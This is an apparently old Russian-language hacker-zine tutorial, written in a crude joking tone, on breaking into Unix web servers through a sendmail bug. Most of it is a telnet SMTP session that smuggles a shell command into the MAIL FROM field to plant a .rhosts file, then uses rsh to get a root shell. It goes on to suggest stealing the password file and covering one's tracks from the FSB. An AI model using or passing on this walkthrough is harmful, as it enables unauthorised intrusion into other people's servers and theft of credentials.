Здравствуйте, дорогие мальчики
и девочки. Что? Уже не девочки? Понятно, извиняюсь...
Сейчас я раскажу вам сказочку... Хотя о чем это я?
Ну да ладно...
Многие уважающие себя люди,
хоть как-то знакомые с интернетом, знают, что
большая часть web-серваков построена на базе
всяких там юниксов и линуксов. И построена не зря.
Эти ОСи, в отличии от виндов глючат не при первом
попавшемся случае и сломать их достаточно сложно
из-за малого количества дырок. Именно из-за
малого; но дырки все-таки присутствуют, т.к.
безглючных операционок существовать не может (даже
у людей дырки есть. Целых семь! На досуге
пересчитай, все-ли целы - ничё там не заросло :))? Ну
вот одну из таких дыр (да не в тебе, а в web-серваках
на юнихе) мы сейчас и рассмотрим...
Вскрытие
Ты когда нибудь е-мылом
пользовался? Ну так вот, твой вампирыч, когда
отсылает почту, первым делом подсединяется к
серваку и передает твою интимную переписку с
хакершей Соней из города Мухосранска такой
проге под названием sendmail. Эта программа
задумывалась как служебная утилита и вошла во
многие дистрибутивы юникс-систем. Но в одной из
версий этой проги есть досадный баг, при
активизации которого сендмейл вываливается в
шелл с правами root'а. Ну вот в принципе-то и всё.
Теоретическая часть закончена, приступаем к
водным процедурам :). Инструментом для взлома нам
будет служить программа, входящая в стандартный
пакет поставки виндов, называется telnet. Вот её и
возьмем. Подключившись к взламываемой машине,
проделываем нижеописанные незамысловатые
действия: (после точки с запятой идут комментарии)
Ампутация
telnet lamer.com 25 - телнетимся на
25 smtp порт
Connecting to 123.123.123.123.
220 sendmail SMI/4.3.5.2 ready
helo xxx - здрасьте, здрасьте, коли не шутите...
220 Helo xxx, ( hacker.com )
mail from: |echo hacker.com/.rhosts@lamer.com
- подставляем команду вместо обратного адреса.
200 Sender ok.
rcpt to: vasya_pupkin_v_gostyah_u_prababushki@lamer.com
- вводим заранее неправильного адресата
500 vasya_pupkin_v_gostyah_u_prababushki@lamer.com: user unknown - не
обращая внимания на визги, продолжаем...
data
230 Enter mail, end with .
200 Mail accepted - трандец.... Готово, сломали!
quit
А теперь заходим так, чтобы нас
не было видно через who
# rsh target.remote.com /bin/csh -i
Welcome to remote.com!
Warning! No access to terminal, job control disabled!
target#
Всё, сендмейл в шелле, можешь спокойно и неторопливо трахать машину. Для примера можно утянуть файл с паролями, а можно
придумать что-то более (экзо\эро)тичное. Всё
ограничивается только твоей извращенской
фантазией. Но в случае, если ты ломаешь что-то
сверхзащищенное, то не забудь замести следы, а то
прийдут добрые дяди из ФСБ и... (Тут запись
обрывается. В результате экспертизы Х на стоящем
на полу магнитофоне будут обнаружены шаги, слова:
"откройте, милиция", крики о помощи и
выстрелы. На полу обнаружена кровь, а автор
вообще не обнаружен).